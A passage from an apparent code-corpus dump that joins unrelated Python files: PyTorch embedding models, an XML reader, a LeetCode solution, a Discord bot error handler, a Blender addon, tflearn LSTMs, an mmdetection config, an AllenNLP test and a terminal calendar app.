elif self.kg_model_ver == 'transe':
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
elif self.kg_model_ver == 'distmult':
pos = torch.sum(projection_DistMult(w_ri_emb, hi_emb, ti_emb), 1)
neg = torch.sum(projection_DistMult(w_ri_emb, hi_emb, tj_emb), 1)
elif self.kg_model_ver == 'transr':
M_R = self.M_R[ri,:]
hi_emb = torch.einsum('ij, ijk -> ik', hi_emb, M_R)
ti_emb = torch.einsum('ij, ijk -> ik', ti_emb, M_R)
tj_emb = torch.einsum('ij, ijk -> ik', tj_emb, M_R)
hi_emb = F.normalize(hi_emb, p=2, dim=1)
ti_emb = F.normalize(ti_emb, p=2, dim=1)
tj_emb = F.normalize(tj_emb, p=2, dim=1)
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
elif self.kg_model_ver == 'transd':
hi_emb = projection_transD(hi_emb, w_ri_emb)
ti_emb = projection_transD(ti_emb, w_ri_emb)
tj_emb = projection_transD(tj_emb, w_ri_emb)
pos = torch.sum((hi_emb + w_ri_emb - ti_emb) ** 2, 1)
neg = torch.sum((hi_emb + w_ri_emb - tj_emb) ** 2, 1)
if self.d2v_model_ver != 'none':
d2v_output = self.d2v.forward(context_ids, doc_ids, target_noise_ids)
d2v_loss = self.cost_func.forward(d2v_output)
else:
d2v_output = torch.FloatTensor([0])
d2v_loss = torch.FloatTensor([0])
if self.kg_model_ver != 'none':
#print (pos.shape, neg.shape)
kg_loss = self.kg_loss_fn(pos, neg, self.margin)
else:
kg_loss = torch.FloatTensor([0])
if self.d2v_model_ver != 'none' and self.kg_model_ver != 'none':
total_loss = (1-self.delta)*d2v_loss + self.delta*kg_loss
elif self.d2v_model_ver != 'none':
total_loss = d2v_loss
elif self.kg_model_ver != 'none':
total_loss = kg_loss
else:
raise ValueError("Both D2V and KG model can not be none")
return total_loss, d2v_loss, kg_loss, d2v_output, pos, neg
def get_paragraph_vector(self, index):
return self.d2v._D[index, :].data.tolist()
class DM(nn.Module):
"""Distributed Memory version of Paragraph Vectors.
Parameters
----------
vec_dim: int
Dimensionality of vectors to be learned (for paragraphs and words).
num_docs: int
Number of documents in a dataset.
num_words: int
Number of distinct words in a daset (i.e. vocabulary size).
"""
def __init__(self, vec_dim, num_docs, num_words):
super(DM, self).__init__()
# paragraph matrix
self._D = nn.Parameter(
torch.randn(num_docs, vec_dim), requires_grad=True)
# word matrix
self._W = nn.Parameter(
torch.randn(num_words, vec_dim), requires_grad=True)
# output layer parameters
self._O = nn.Parameter(
torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)
def forward(self, context_ids, doc_ids, target_noise_ids):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
context_ids: torch.Tensor of size (batch_size, num_context_words)
Vocabulary indices of context words.
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
# combine a paragraph vector with word vectors of
# input (context) words
x = torch.add(
self._D[doc_ids, :], torch.sum(self._W[context_ids, :], dim=1))
# sparse computation of scores (unnormalized log probabilities)
# for negative sampling
return torch.bmm(
x.unsqueeze(1),
self._O[:, target_noise_ids].permute(1, 0, 2)).squeeze()
def get_paragraph_vector(self, index):
return self._D[index, :].data.tolist()
class DBOW(nn.Module):
"""Distributed Bag of Words version of Paragraph Vectors.
Parameters
----------
vec_dim: int
Dimensionality of vectors to be learned (for paragraphs and words).
num_docs: int
Number of documents in a dataset.
num_words: int
Number of distinct words in a daset (i.e. vocabulary size).
"""
def __init__(self, vec_dim, num_docs, num_words):
super(DBOW, self).__init__()
# paragraph matrix
self._D = nn.Parameter(
torch.randn(num_docs, vec_dim), requires_grad=True)
# output layer parameters
self._O = nn.Parameter(
torch.FloatTensor(vec_dim, num_words).zero_(), requires_grad=True)
def forward(self, context_ids, doc_ids, target_noise_ids):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
# sparse computation of scores (unnormalized log probabilities)
# for negative sampling
return torch.bmm(
self._D[doc_ids, :].unsqueeze(1),
self._O[:, target_noise_ids].permute(1, 0, 2)).squeeze()
def get_paragraph_vector(self, index):
return self._D[index, :].data.tolist()
| 2.96875 | 3 |
src/screensketch/screenspec/reader/xml.py | perfidia/screensketch | 1 | 12797985 | '''
Created on Apr 12, 2013
@author: <NAME>
'''
from lxml import etree
from StringIO import StringIO
from screensketch.screenspec import model
class XMLReader(object):
def __init__(self, input_data):
self.input_data = input_data
self.retval = None;
def __parseComponent(self, node, parent):
items = node.items()
if len(items) > 1:
raise ValueError('Incorrect data in component node')
name = None
if len(items) == 1:
name = items[0][1]
clazz = {
'EDIT_BOX': model.EditBox,
'BUTTON': model.Button,
'CHECK_BOX': model.CheckBox,
'CHECK_BOXES': model.CheckBoxes,
'COMBO_BOX': model.ComboBox,
'DYNAMIC_TEXT': model.DynamicText,
'EDIT_BOX': model.EditBox,
'IMAGE': model.Image,
'LINK': model.Link,
'LIST': model.List,
'LIST_BOX': model.ListBox,
'PASSWORD': model.Password,
'RADIO_BUTTON': model.RadioButton,
'RADIO_BUTTONS': model.RadioButtons,
'SIMPLE': model.Simple,
'STATIC_TEXT': model.StaticText,
'TABLE': model.Table,
'TEXT_AREA': model.TextArea,
}.get(name, model.Entity)
if clazz is None:
raise ValueError('%s is an unsupported type of component' % name)
children = []
values = []
for n in node.getchildren():
if n.tag == 'identifier':
identifier = n.text
elif n.tag == 'children':
children = self.__parseChildren(n, parent)
elif n.tag == 'values':
values = self.__parseValues(n, parent)
else:
raise ValueError('%s is an unsupported node in component tag' % n.tag)
component = clazz(identifier)
for child in children:
component.append(child)
if values:
component._set_static_values(values)
return component
def __parseValues(self, node, parent):
# tag name checked in __parseComponent
children = []
for n in node.getchildren():
if n.tag == 'value':
selected = False
items = n.items()
if len(items) == 1 and len(items[0]) == 2:
selected = items[0][1]
children.append(model.StaticValue(n.text, selected))
else:
raise ValueError('%s is an unsupported node in values tag' % n.tag)
return children
def __parseChildren(self, node, parent):
# tag name checked in __parseScreen
children = []
for n in node.getchildren():
children.append(self.__parseComponent(n, parent))
return children
def __parseScreen(self, node, parent):
if node.tag != 'screen':
raise ValueError('Tag screen-spec not found')
children = []
for n in node.getchildren():
if n.tag == 'name':
name = n.text
elif n.tag == 'children':
children = self.__parseChildren(n, parent)
else:
raise ValueError('Unknown node in screen tag found')
parent.append(model.Screen(name, children))
def __parseScreenSpec(self, node):
if node.tag != 'screen-spec':
raise ValueError('Tag screen-spec not found')
self.retval = model.ScreenSpec()
for n in node.getchildren():
self.__parseScreen(n, self.retval)
def execute(self):
root = etree.fromstring(self.input_data)
self.__parseScreenSpec(root)
return self.retval
| 2.421875 | 2 |
Leetcode/0652. Find Duplicate Subtrees/0652.py | Next-Gen-UI/Code-Dynamics | 0 | 12797986 | <reponame>Next-Gen-UI/Code-Dynamics
class Solution:
def findDuplicateSubtrees(self, root: Optional[TreeNode]) -> List[Optional[TreeNode]]:
ans = []
count = Counter()
def encode(root: Optional[TreeNode]) -> str:
if not root:
return ''
left = encode(root.left)
right = encode(root.right)
encoding = str(root.val) + '#' + left + '#' + right
if count[encoding] == 1:
ans.append(root)
count[encoding] += 1
return encoding
encode(root)
return ans
| 2.9375 | 3 |
events/on_error.py | DangVietH/DangVietBot | 2 | 12797987 | from discord.ext import commands
import discord
import datetime
class OnError(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_command_error(self, ctx, error):
ignore = (commands.CommandNotFound, discord.NotFound, discord.Forbidden)
if isinstance(error, ignore):
return
embed = discord.Embed(color=self.bot.embed_color)
if isinstance(error, commands.BotMissingPermissions):
perms = ", ".join([f"{x.replace('_', ' ').replace('guild', 'server').title()}" for x in error.missing_permissions])
embed.title = "Bot Missing Permissions"
embed.description = f"I am missing the following permissions: {perms}!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.MissingPermissions):
perms = ", ".join([f"{x.replace('_', ' ').replace('guild', 'server').title()}" for x in error.missing_permissions])
embed.title = "Missing Permissions"
embed.description = f"You are missing the following permissions: {perms}!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.NotOwner):
embed.title = "Not Owner"
embed.description = f"You're not the owner of this bot!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.MissingRequiredArgument):
embed.title = "Missing Argument"
embed.description = f"You are missing a required argument for this command to work: `{error.param.name}`!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.CommandOnCooldown):
seconds = int(error.retry_after)
wait_until_finish = datetime.datetime.now() + datetime.timedelta(seconds=seconds)
await ctx.send(f'⏱️ This command is on a cooldown. Use it after <t:{int(datetime.datetime.timestamp(wait_until_finish))}:R>')
return
if isinstance(error, commands.DisabledCommand):
embed.title = "Disabled"
embed.description = "This command is disabled by the bot's owner!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.BadArgument):
if isinstance(error, commands.MessageNotFound):
embed.title = "Message Not Found"
embed.description = "The message id/link you provided is invalid or deleted!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.MemberNotFound):
embed.title = "Member Not Found"
embed.description = "The member id/mention/name you provided is invalid or didn't exist in this server!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.UserNotFound):
embed.title = "User Not Found"
embed.description = "The user id/mention/name you provided is invalid or I cannot see that User!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.ChannelNotFound):
embed.title = "Channel Not Found"
embed.description = "The channel id/mention/name you provided is invalid or I access it!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.RoleNotFound):
embed.title = "Role Not Found"
embed.description = "The role id/mention/name you provided is invalid or I cannot see that role!"
await ctx.send(embed=embed)
return
if isinstance(error, commands.EmojiNotFound):
embed.title = "Emoji Not Found"
embed.description = "The emoji id/name you provided is invalid or I cannot see that emoji!"
await ctx.send(embed=embed)
return
embed.title = "Unexpected Error"
embed.description = error
await ctx.send(embed=embed)
async def setup(bot):
await bot.add_cog(OnError(bot)) | 2.640625 | 3 |
scripts/addons/context_browser/preferences.py | Tilapiatsu/blender-custom_conf | 2 | 12797988 | <reponame>Tilapiatsu/blender-custom_conf<filename>scripts/addons/context_browser/preferences.py
import bpy
from .addon import ADDON_ID, temp_prefs, prefs, ic
from .utils.collection_utils import sort_collection
from .ops.context_browser import CB_OT_browser
class BookmarkItem(bpy.types.PropertyGroup):
path = bpy.props.StringProperty()
class CB_Preferences(bpy.types.AddonPreferences):
bl_idname = ADDON_ID
bookmarks = bpy.props.CollectionProperty(type=BookmarkItem)
def update_lists(self, context):
tpr = temp_prefs()
tpr.cd.update_lists(tpr.path, False)
show_bool_props = bpy.props.BoolProperty(
name="Show Bool Properties", description="Show bool properties",
default=True, update=update_lists)
show_int_props = bpy.props.BoolProperty(
name="Show Int Properties", description="Show int properties",
default=True, update=update_lists)
show_float_props = bpy.props.BoolProperty(
name="Show Float Properties", description="Show float properties",
default=True, update=update_lists)
show_str_props = bpy.props.BoolProperty(
name="Show String Properties", description="Show string properties",
default=True, update=update_lists)
show_enum_props = bpy.props.BoolProperty(
name="Show Enum Properties", description="Show enum properties",
default=True, update=update_lists)
show_vector_props = bpy.props.BoolProperty(
name="Show Vector Properties", description="Show vector properties",
default=True, update=update_lists)
group_none = bpy.props.BoolProperty(
name="Group None Objects",
description="Group None objects",
default=False, update=update_lists)
show_prop_ids = bpy.props.BoolProperty(
name="Show Property Identifiers",
description="Show property identifiers",
default=True)
def show_header_btn_update(self, context):
prefs().register_header_btn(self.show_header_btn)
show_header_btn = bpy.props.BoolProperty(
name="Show Header Button",
description="Show header button",
update=show_header_btn_update,
default=True)
obj_list_width = bpy.props.IntProperty(
name="Width", description="Width of the list",
subtype='PERCENTAGE',
default=40, min=20, max=80)
list_height = bpy.props.IntProperty(
name="Number of Rows", description="Number of rows in lists",
default=10, min=5, max=100)
popup_width = bpy.props.IntProperty(
name="Width", description="Popup width",
subtype='PIXEL',
default=640, min=300, max=3000)
def draw(self, context):
layout = self.layout
row = layout.row()
row.scale_y = 1.5
row.operator(CB_OT_browser.bl_idname)
row = layout.split()
col = row.column(align=True)
col.label(text="Popup:")
col.prop(self, "popup_width")
col.prop(self, "list_height")
col = row.column(align=True)
col.label(text="Header:")
col.prop(self, "show_header_btn")
def add_bookmark(self, bookmark, name=None):
if bookmark in self.bookmarks:
return
item = self.bookmarks.add()
item.name = name or bookmark
item.path = bookmark
sort_collection(self.bookmarks, key=lambda item: item.name)
def remove_bookmark(self, bookmark):
for i, b in enumerate(self.bookmarks):
if b.path == bookmark:
self.bookmarks.remove(i)
break
def rename_bookmark(self, bookmark, name):
for b in self.bookmarks:
if b.path == bookmark:
b.name = name
break
sort_collection(self.bookmarks, key=lambda item: item.name)
def register_header_btn(self, value):
for tp_name in (
'CLIP_HT_header', 'CONSOLE_HT_header',
'DOPESHEET_HT_header', 'FILEBROWSER_HT_header',
'GRAPH_HT_header', 'IMAGE_HT_header',
'INFO_HT_header', 'LOGIC_HT_header',
'NLA_HT_header', 'NODE_HT_header',
'OUTLINER_HT_header', 'PROPERTIES_HT_header',
'SEQUENCER_HT_header', 'TEXT_HT_header',
'TIME_HT_header', 'USERPREF_HT_header',
'VIEW3D_HT_header'):
tp = getattr(bpy.types, tp_name, None)
if not tp:
continue
if value:
tp.prepend(self.header_menu)
else:
tp.remove(self.header_menu)
@staticmethod
def context_menu(menu, context):
layout = menu.layout
layout.operator("cb.browser", icon=ic('BLENDER'))
@staticmethod
def header_menu(menu, context):
layout = menu.layout
layout.operator("cb.browser", text="", icon=ic('BLENDER'), emboss=False)
def register():
pr = prefs()
if pr.show_header_btn:
pr.register_header_btn(True)
def unregister():
pr = prefs()
if pr.show_header_btn:
pr.register_header_btn(False)
| 1.953125 | 2 |
net/lstm.py | workofart/brawlstars-ai | 12 | 12797989 | <filename>net/lstm.py<gh_stars>10-100
import numpy as np
import tensorflow as tf
import tflearn
import os
def get_movement_model(steps):
# Network building
net = tflearn.input_data(shape=[None, steps, 128], name='net1_layer1')
net = tflearn.lstm(net, n_units=256, return_seq=True, name='net1_layer2')
net = tflearn.dropout(net, 0.8, name='net1_layer3')
net = tflearn.lstm(net, n_units=256, return_seq=False, name='net1_layer4')
net = tflearn.dropout(net, 0.8, name='net1_layer5')
net = tflearn.fully_connected(net, 5, activation='softmax', name='net1_layer6')
net = tflearn.regression(net, optimizer='rmsprop', loss='categorical_crossentropy', learning_rate=0.0001,
name='net1_layer7')
return tflearn.DNN(net, clip_gradients=5.0, tensorboard_dir='logs', tensorboard_verbose=0)
def get_action_model(steps):
# Network building
net = tflearn.input_data(shape=[None, steps, 128], name='net2_layer1')
net = tflearn.lstm(net, n_units=256, return_seq=True, name='net2_layer2')
net = tflearn.dropout(net, 0.8, name='net2_layer3')
net = tflearn.lstm(net, n_units=256, return_seq=False, name='net2_layer4')
net = tflearn.dropout(net, 0.8, name='net2_layer5')
net = tflearn.fully_connected(net, 3, activation='softmax', name='net2_layer6')
net = tflearn.regression(net, optimizer='rmsprop', loss='categorical_crossentropy', learning_rate=1e-5,
name='net2_layer7')
return tflearn.DNN(net, clip_gradients=5.0, tensorboard_dir='logs', tensorboard_verbose=0)
def reshape_for_lstm(data, steps_of_history=10):
trainX = []
trainY_movement = []
trainY_action = []
for i in range(0, len(data) - steps_of_history):
window = data[i:i + steps_of_history]
sampleX = []
for row in window:
sampleX.append(row[0])
sampleY_movement = np.array(window[-1][1]).reshape(-1)
sampleY_action = np.array(window[-1][2]).reshape(-1)
trainX.append(np.array(sampleX).reshape(steps_of_history, -1))
trainY_movement.append(sampleY_movement)
trainY_action.append(sampleY_action)
print(np.array(trainX).shape)
print(np.array(trainY_movement).shape)
print(np.array(trainY_action).shape)
return trainX, list(trainY_movement), list(trainY_action)
| 2.671875 | 3 |
basics/deque_example.py | examplehub/Python | 9 | 12797990 | def main() -> None:
"""
>>> from collections import deque
>>> queue = deque(["Python", "Java", "C"])
>>> len(queue)
3
>>> queue
deque(['Python', 'Java', 'C'])
>>> queue.popleft()
'Python'
>>> queue.popleft()
'Java'
>>> queue.clear()
>>> len(queue)
0
>>> queue
deque([])
>>> queue.popleft()
Traceback (most recent call last):
...
IndexError: pop from an empty deque
"""
if __name__ == "__main__":
from doctest import testmod
testmod()
| 3.078125 | 3 |
downstream/tinypersons/configs2/TinyPerson/base/retinanet_r50_fpns4_1x_TinyPerson640_clipg.py | bwconrad/solo-learn | 37 | 12797991 | <gh_stars>10-100
_base_ = [
'./retinanet_r50_fpn_1x_TinyPerson640.py'
]
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001) # 4 gpu
optimizer_config = dict(_delete_=True, grad_clip=dict(max_norm=1, norm_type=2)) # add grad clip
# model settings
model = dict(
neck=dict(
start_level=0, # start_level=1,
# add_extra_convs='on_input', # note
num_outs=5),
bbox_head=dict(
type='RetinaHead',
num_classes=1, # 80
anchor_generator=dict(
type='AnchorGenerator',
octave_base_scale=2, # 4
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64] # [8, 16, 32, 64, 128]
)
)
)
| 1.492188 | 1 |
tests/modules/transformer/bimodal_attention_test.py | MSLars/allennlp | 11,433 | 12797992 | <gh_stars>1000+
import torch
import pytest
from allennlp.common import Params
from allennlp.modules.transformer import BiModalAttention
@pytest.fixture
def params_dict():
return {
"hidden_size1": 6,
"hidden_size2": 4,
"combined_hidden_size": 16,
"num_attention_heads": 2,
"dropout1": 0.1,
"dropout2": 0.2,
}
@pytest.fixture
def params(params_dict):
return Params(params_dict)
@pytest.fixture
def biattention(params):
return BiModalAttention.from_params(params.duplicate())
def test_can_construct_from_params(biattention, params_dict):
assert biattention.num_attention_heads == params_dict["num_attention_heads"]
assert biattention.attention_head_size == int(
params_dict["combined_hidden_size"] / params_dict["num_attention_heads"]
)
assert (
biattention.all_head_size
== params_dict["num_attention_heads"] * biattention.attention_head_size
)
assert biattention.query1.in_features == params_dict["hidden_size1"]
assert biattention.key1.in_features == params_dict["hidden_size1"]
assert biattention.value1.in_features == params_dict["hidden_size1"]
assert biattention.dropout1.p == params_dict["dropout1"]
assert biattention.query2.in_features == params_dict["hidden_size2"]
assert biattention.key2.in_features == params_dict["hidden_size2"]
assert biattention.value2.in_features == params_dict["hidden_size2"]
assert biattention.dropout2.p == params_dict["dropout2"]
def test_forward_runs(biattention):
biattention(
torch.randn(2, 3, 6),
torch.randn(2, 3, 4),
torch.randint(0, 2, (2, 2, 3, 3)) == 1, # creating boolean tensors
torch.randint(0, 2, (2, 2, 3, 3)) == 1,
)
| 2.25 | 2 |
People/Juan/Week 2/Calendar.py | rmorgan10/ExpertPythonProgramming | 2 | 12797993 | #!/usr/bin/env python3
from typing import List, Dict
from datetime import date, datetime
from calendar import monthrange
import os
from typing import TypeVar, Tuple
from benedict import benedict
from Events import Event
from CalendarErrors import BreakoutError, MainError
from Prompt import prompt_user_date, parse_user_date, prompt_user_time
"""
Should print a calendar to the terminal/console output and prompt the user to
input some number of possible commands to:
* scroll from month to month
* make, read, and modify events on certain days
"""
DateTypes = TypeVar("DateTypes", date, datetime)
class Calendar:
"""
Calendar class to hold info on all events in our calendar
"""
WEEKDAYS = ["Mo", "Tu", "We", "Th", "Fr", "Sa", "Su"]
# calendar commands ============================================================================
# scroll ---------------------------------------------------------------------------------------
SCROLL = "S"
FORWARD = "F"
BACKWARD = "B"
SCROLLING = [SCROLL, FORWARD, BACKWARD]
# Event ----------------------------------------------------------------------------------------
NEW = "N"
MODIFY = "C"
READ = "R"
EVENTS = [NEW, MODIFY, READ]
VERB = {
NEW: "Made",
MODIFY: "Modified",
READ: "Read"
}
# utility --------------------------------------------------------------------------------------
QUIT = "Q"
HELP = "H"
ALL = "A"
UTIL = [QUIT, HELP, ALL]
COMMANDS = SCROLLING + EVENTS + UTIL
# indicators -----------------------------------------------------------------------------------
DAY = "D"
MONTH = "M"
YEAR = "Y"
EVENT = "E"
INDICATORS = [DAY, MONTH, YEAR, EVENT]
MONTHS = {
1: "January",
2: "February",
3: "March",
4: "April",
5: "May",
6: "June",
7: "July",
8: "August",
9: "September",
10: "October",
11: "November",
12: "December"
}
MENU_STRING = f"""
Here's how to use the calendar!
To scroll to the next day enter : {FORWARD}{DAY}
TO scroll to the previous day enter : {BACKWARD}{DAY}
To scroll to the the next month enter : {FORWARD}{MONTH}
To scroll to the previous month enter : {BACKWARD}{MONTH}
To scroll to the next year enter : {FORWARD}{YEAR}
To scroll to the previous year enter : {BACKWARD}{YEAR}
To scroll to a date enter : {SCROLL} <date in yyyy/mm/dd format>
To create an event enter : {NEW} <date in yyyy/mm/dd format> - <name>
To modify an event enter : {MODIFY} <date in yyyy/mm/dd format> - <name>
To read an event enter : {READ} <date in yyyy/mm/dd format> - <name>
To print all events enter : {ALL}
(To continue Press enter)
"""
def __init__(self):
"""
Constructor for the Calendar
Stores events as a nested dictionary with dates as keys, lastly with a names dict.
Structure:
self.events = {
year(str) : {
month(str) : {
day(str) : {
name(str) : (Event)
}
}
}
}
"""
self.events = benedict()
self.today = date.today()
def command_loop(self):
"""
Main loop of the calendar. Prompts the user to input commands to modify the calendar or
scroll around in time
"""
command_ms = "Welcome to the calendar, what would you like to do? \n"
command_ms += "(Q to quit, H for help) : "
ignores = [" ", "\n"]
while True:
self.print_calendar()
user_input = input(command_ms)
for ignore in ignores:
user_input = user_input.replace(ignore, "")
try:
cmd = user_input[0].upper()
except IndexError:
continue
try:
if cmd == self.QUIT:
break
elif cmd == self.HELP:
input(self.MENU_STRING)
elif cmd == self.ALL:
self.print_all_events()
elif cmd in self.SCROLLING:
self.scroll(user_input)
elif cmd in self.EVENTS:
self.eventing(user_input)
else:
input(f"{cmd} is not a valid command, please input a valid command\
{self.MENU_STRING}")
# MainError is just an indicator that user wants to try and input again
except MainError:
continue
def scroll(self, usr_input: str):
"""
parse scroll commands from the user and make the correct call to print_calendar()
Args:
usr_input : string input by the user. Should be led by a valid scroll based command
"""
cmd = usr_input[0]
if len(usr_input) > 1:
usr_args = usr_input[1:]
else:
usr_args = None
if cmd == self.SCROLL:
calendar_date = parse_user_date(usr_args)
self.today = calendar_date
elif cmd == self.FORWARD or cmd == self.BACKWARD:
# Move forward of backward
if cmd == self.FORWARD:
sgn = 1
else:
sgn = -1
if usr_args is not None:
usr_ind = usr_args[0].upper()
else:
usr_ind = usr_args
if usr_ind == self.YEAR:
self.today = date(self.today.year+sgn, self.today.month, self.today.day)
elif usr_ind == self.DAY:
self.today = date(self.today.year, self.today.month, self.today.day+sgn)
else: # Scroll by month is default
self.today = date(self.today.year, self.today.month+sgn, self.today.day)
def eventing(self, usr_input: str):
"""
parse event commands from the user and edit self.events dict
Args:
usr_input : string input by the user. Should be led by a valid event based command
"""
cmd = usr_input[0]
if len(usr_input) > 1:
usr_args = usr_input[1:]
else:
usr_args = None
if usr_args is None:
calendar_date = prompt_user_date("Lets get a date for the event")
name = input("Give us a name for the event : ")
else:
usr_args = usr_args.split("-")[:2]
calendar_date = parse_user_date(usr_args[0])
if len(usr_args) >= 2:
name = usr_args[1]
else:
name = input(f"What is the name of the event to be {Calendar.VERB[cmd]}")
if cmd == self.NEW:
self.add_event(calendar_date, name)
input(f"new event created {self.get_event(calendar_date, name)}")
if cmd == self.MODIFY or cmd == self.READ:
if name in self.find_events(calendar_date).keys():
if cmd == self.MODIFY:
mod_event = self.get_event(calendar_date, name)
mod_event.modify()
self.update_event(mod_event, calendar_date, name)
input(f"Modified event : {mod_event}")
else:
input(self.get_event(calendar_date, name))
else:
input("The event you described does not exist. Back to main menu ")
def update_event(self, modified_event: Event, old_date: DateTypes, old_name: str):
"""
Checks event after it's been modified and rewrites it to the dict with updated indeces
"""
input("Hello There")
new_ev = self.get_event(modified_event.date_of_event, modified_event.name)
old_ev = self.get_event(old_date, old_name)
if new_ev != old_ev:
input("General Kenobi")
pop_str = f"{old_date.year}.{old_date.month}.{old_date.day}.{old_name}"
self.events.pop(pop_str)
Calendar.clean_nested_dict(self.events)
self.events[
self.ind_from_date(modified_event.date_of_event, modified_event.name)
] = modified_event
def print_all_events(self):
prnt = "{\n"
for year, months in self.events.items():
prnt += f"\t{year} : " + "{\n"
for month, days in months.items():
prnt += f"\t\t{month} : " + "{\n"
for day, names in days.items():
prnt += f"\t\t\t{day} : " + "{\n"
for name, ev in names.items():
ev_str = repr(ev).replace("\n", "\n\t\t\t\t\t")
prnt += f"\t\t\t\t{name}\t{ev_str}\n"
prnt += "\t\t\t},\n"
prnt += "\t\t},\n"
prnt += "\t},\n"
prnt += "}"
input(prnt)
@staticmethod
def clean_nested_dict(nested_dict):
"""
Recursively cleans nested_dict to remove empty dicts and subdicts
Believe it or not this works. Checkout the Calendar testing ipython notebook.
"""
# if lowest level item is not an empty dict, don't pop this, or parents
if not isinstance(nested_dict, dict):
return False
# if lowest level item is an empty dict, pop this from the parent and clean up recursively
if nested_dict == {}:
return True
# indicates whether this dict/sub_dict should be "popped" (cleaned up)
pop_this = True
for key, sub_dict in list(nested_dict.items()):
pop_that = Calendar.clean_nested_dict(sub_dict)
if pop_that:
nested_dict.pop(key)
pop_this *= pop_that
return pop_this
@staticmethod
def ind_from_date(calendar_date: DateTypes, name: str = None):
"""
Args:
calendar_date : date to be used for indexing
name : optional. Tacked on to return if included
Returns:
year (int), month (int), day (int), name (str)
"""
if name is not None:
return str(calendar_date.year), str(calendar_date.month), str(calendar_date.day), name
else:
return str(calendar_date.year), str(calendar_date.month), str(calendar_date.day)
def get_event(self, calendar_date: DateTypes, name: str) -> Event:
"""
Gets an event from a name and a date
Args:
calendar_date : date of the event
name : name of the event:
Returns:
The event found. Or None if none are found
"""
try:
ev = self.events[self.ind_from_date(calendar_date, name)]
except KeyError:
ev = None
return ev
def find_events(self, calendar_date: DateTypes) -> Dict:
"""
finds all events that occur on calendar_date and returns them
Args:
calendar_date : date or datetime object where we're looking for events
Returns:
daily events : dictionary of events occurring on that day, empty dict if there are none
"""
try:
daily_events = self.events[self.ind_from_date(calendar_date)]
except KeyError:
daily_events = {}
return daily_events
def add_event(self, calendar_date: DateTypes, name: str):
"""
Adds an event to the calendar
Args:
calendar_date : date of the new event
name : name of that event
"""
while name in self.find_events(calendar_date).keys():
overwrite = input(
f"Another event is named {name} on that date. Do you wish to overwrite it? (Y/n) : "
f"Other event : {self.get_event(calendar_date, name)}\n"
)
overwrite = overwrite.upper() != "N"
if not overwrite:
name = input(f"Please enter a new name for the event : ")
else:
break
description = input("Give us a brief description of the event : \n")
if input("Do you wish to specify a time? (y/N)").upper() != "Y":
self.events[self.ind_from_date(calendar_date, name)] = Event(
calendar_date,
name,
description,
)
else:
self.events[self.ind_from_date(calendar_date, name)] = Event(
calendar_date,
name,
description,
prompt_user_time("What time do you want to set?")
)
def print_calendar(self):
"""
Prints a calendar to the terminal or command for the month which contains day.
"""
def color_entry(message: str, txt: str = "normal", bg: str = "normal") -> str:
"""
turns message into a colorful version of itself
Args:
message : message to be beautified
txt : string indicating color of text
bg : string indicating color of background
Returns:
beautified message
"""
txt_colors = {
"black": "30",
"red": "31",
"green": "32",
"yellow": "33",
"blue": "34",
"purple": "35",
"cyan": "36",
"white": "37",
"normal": 1
}
bg_colors = {
"black": f"{37+10}",
"red": f"{31 + 10}",
"green": f"{32 + 10}",
"yellow": f"{33 + 10}",
"blue": f"{34 + 10}",
"purple": f"{35 + 10}",
"cyan": f"{36 + 10}",
"white": f"{30 + 10}",
"normal": 1
}
return f"\033[1;{txt_colors[txt]};{bg_colors[bg]}m{message}\033[0m"
os.system('cls')
# Find which day of the week the month started on
first_day = date(self.today.year, self.today.month, 1).weekday()
# Find number of days in month
num_days = monthrange(self.today.year, self.today.month)[1]
try:
monthly_events = list(self.events[str(self.today.year), str(self.today.month)].keys())
monthly_events = [int(dy) for dy in monthly_events]
except KeyError:
monthly_events = []
cal_string = ""
# Print month and year
cal_string += color_entry(
f"{self.MONTHS[self.today.month]} : {self.today.year}\n",
txt="cyan"
)
# Print the days of the week
for day in self.WEEKDAYS:
cal_string += f"{day} "
cal_string += "\n"
days = 0
while days < num_days:
for i, day in enumerate(self.WEEKDAYS):
if days == 0 and i < first_day:
entry = " "
else:
days += 1
entry = f"{days:2} "
if days in monthly_events and not days == self.today.day:
entry = color_entry(entry, txt="green")
if days == self.today.day and days not in monthly_events:
entry = color_entry(entry, bg="red")
if days == self.today.day and days in monthly_events:
entry = color_entry(entry, txt="green", bg="red")
if days > num_days:
entry = " "
cal_string += entry
cal_string += "\n"
print(cal_string)
if __name__ == '__main__':
cal = Calendar()
cal.command_loop()
| 3.96875 | 4 |
setup.py | axel-sirota/IEEE-CICD | 0 | 12797994 | <filename>setup.py
from setuptools import setup
setup(name='funniest_ieee',
version='0.5',
description='The funniest_ieee joke in the world',
url='https://github.com/axel-sirota/IEEE-CICD',
author='<NAME>',
author_email='<EMAIL>',
license='MIT',
KEYWORDS = ["class", "attribute", "boilerplate"],
CLASSIFIERS = [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
